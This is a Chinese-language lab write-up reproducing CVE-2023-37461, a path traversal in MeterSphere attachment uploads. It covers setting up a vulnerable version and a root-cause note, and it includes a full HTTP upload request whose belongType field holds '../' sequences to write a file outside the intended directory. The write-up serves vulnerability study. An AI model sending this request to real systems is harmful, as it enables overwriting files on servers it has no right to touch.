漏洞信息
NVD - cve-2023-37461
Metersphere is an opensource testing framework. Files uploaded to Metersphere may define a belongType
value with a relative path like ../../../../
which may cause metersphere to attempt to overwrite an existing file in the defined location or to create a new file. Attackers would be limited to overwriting files that the metersphere process has access to. This issue has been addressed in version 2.10.3. Users are advised to upgrade. There are no known workarounds for this vulnerability.
背景介绍
MeterSphere is an open-source, continuous testing platform widely used by developers and QA managers for test plan management, data-driven testing, and test reporting metrics. It is engineered to integrate seamlessly with a variety of development and CI/CD toolchains to enhance productivity in DevOps environments. The platform supports functional UI, performance, and API testing, aiming to optimize testing workflows. The primary users of MeterSphere are software development teams and testing specialists seeking to attain high-quality assurance in their product cycles. Its robust plug-in architecture allows it to be extended and customized for specific workflows and tool integrations, making it adaptable across different industry requirements.
主页:https://metersphere.io/
源码:https://github.com/metersphere/metersphere
环境搭建
$ wget https://github.com/metersphere/metersphere/releases/download/v2.10.1-lts/metersphere-online-installer-v2.10.1-lts.tar.gz --no-check-certificate
$ tar zxvf metersphere-online-installer-v2.10.1-lts.tar.gz
$ cd metersphere-online-installer-v2.10.1-lts
$ sudo ./install.sh
$ msctl status
Name Command State Ports
--------------------------------------------------------------------------------------
api-test /deployments/run-java.sh Up (healthy) 0.0.0.0:10000->10000/tc
p,:::10000->10000/tcp,
0.0.0.0:10001->10001/tc
p,:::10001->10001/tcp,
0.0.0.0:10002->10002/tc
p,:::10002->10002/tcp,
0.0.0.0:10003->10003/tc
p,:::10003->10003/tcp,
0.0.0.0:10004->10004/tc
p,:::10004->10004/tcp,
0.0.0.0:10005->10005/tc
p,:::10005->10005/tcp,
0.0.0.0:10006->10006/tc
p,:::10006->10006/tcp,
0.0.0.0:10007->10007/tc
p,:::10007->10007/tcp,
0.0.0.0:10008->10008/tc
p,:::10008->10008/tcp,
0.0.0.0:10009->10009/tc
p,:::10009->10009/tcp,
0.0.0.0:10010->10010/tc
p,:::10010->10010/tcp
eureka /deployments/run-java.sh Up (healthy)
gateway /deployments/run-java.sh Up (healthy) 0.0.0.0:8081->8000/tcp,
:::8081->8000/tcp
kafka /opt/bitnami/scripts/kaf Up (healthy) 0.0.0.0:9092->9092/tcp,
ka ... :::9092->9092/tcp
minio /usr/bin/docker- Up (healthy) 0.0.0.0:9000->9000/tcp,
entrypoint ... :::9000->9000/tcp, 0.0.
0.0:9001->9001/tcp,:::9
001->9001/tcp
ms-data-streaming /deployments/run-java.sh Up (healthy)
ms-node-controller sh -c sed -i Up (healthy) 0.0.0.0:8082->8082/tcp,
"s/:101:/:136 ... :::8082->8082/tcp, 0.0.
0.0:9100->9100/tcp,:::9
100->9100/tcp
ms-prometheus /bin/prometheus Up (healthy) 0.0.0.0:9091->9090/tcp,
--config.f ... :::9091->9090/tcp
mysql docker-entrypoint.sh Up (healthy) 0.0.0.0:3306->3306/tcp,
mysqld :::3306->3306/tcp,
33060/tcp
nodeexporter /bin/node_exporter Up (healthy)
--path. ...
performance-test /deployments/run-java.sh Up (healthy)
project-management /deployments/run-java.sh Up (healthy)
redis docker-entrypoint.sh Up (healthy) 0.0.0.0:6379->6379/tcp,
redis ... :::6379->6379/tcp
report-stat /deployments/run-java.sh Up (healthy)
system-setting /deployments/run-java.sh Up (healthy)
test-track /deployments/run-java.sh Up (healthy)
workstation /deployments/run-java.sh Up (healthy)
Debug1:访问Web UI有{"success":false,"message":"401 UNAUTHORIZED \"Not found session, Please Login again.\"","data":null}
报错,一定要等待所有容器Up并healthy状态,后再等5min访问Web UI(不要中途切换)。
Debug2:9090端口号占用问题,在docker-compose-prometheus.yml
和install.conf
修改为9091即可。
# Debug3: Additionally
$ msctl restart gateway
$ msctl restart workstation
$ msctl restart prometheus
Web UI:http://127.0.0.1:8081
账号admin、密码metersphere
漏洞复现
参考:https://github.com/metersphere/metersphere/security/advisories/GHSA-xfr9-jgfp-fx3v
登录系统后按照如下步骤创建一个测试用例:
本地上传附件,触发Upload请求:
抓包,修改belongId
和belongType
字段,发包后200 OK
:
POC:
POST /track/attachment/testcase/upload HTTP/1.1
Host: 127.0.0.1:8081
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN
Accept-Encoding: gzip, deflate, br
CSRF-TOKEN: uzKF86dFBZ5H5IsT6tT1Zx3WibRCV3i9yQxwgR7zLKElhRigvfYLlvBxufS9MqxqnrIEJm2RCbAK/1pBGoEvrA==
X-AUTH-TOKEN: c34a7ff5-53b1-44ff-bd53-c03fe5c7b148
WORKSPACE: 7a6e6750-bdb8-11ef-bcf6-0242ac1e0a07
PROJECT: 7a6e9276-bdb8-11ef-bcf6-0242ac1e0a07
Content-Type: multipart/form-data; boundary=---------------------------108034667142566387213929135350
Content-Length: 480
Origin: http://127.0.0.1:8081
Connection: keep-alive
Referer: http://127.0.0.1:8081/
-----------------------------108034667142566387213929135350
Content-Disposition: form-data; name="file"; filename="hacked.php"
Content-Type: text/html
<script>alert("You are hacked\!")</script>
-----------------------------108034667142566387213929135350
Content-Disposition: form-data; name="request"; filename="blob"
Content-Type: application/json
{"belongId":"","belongType":"../../../../../../../tmp"}
-----------------------------108034667142566387213929135350--
漏洞分析
uploadAttachment
方法检查了BelongType
是否等于ISSUE
以及TEST_CASE
。如果都不是,就直接在函数saveAttachment
中使用BelongType
作为文件名的一部分,导致路径穿越。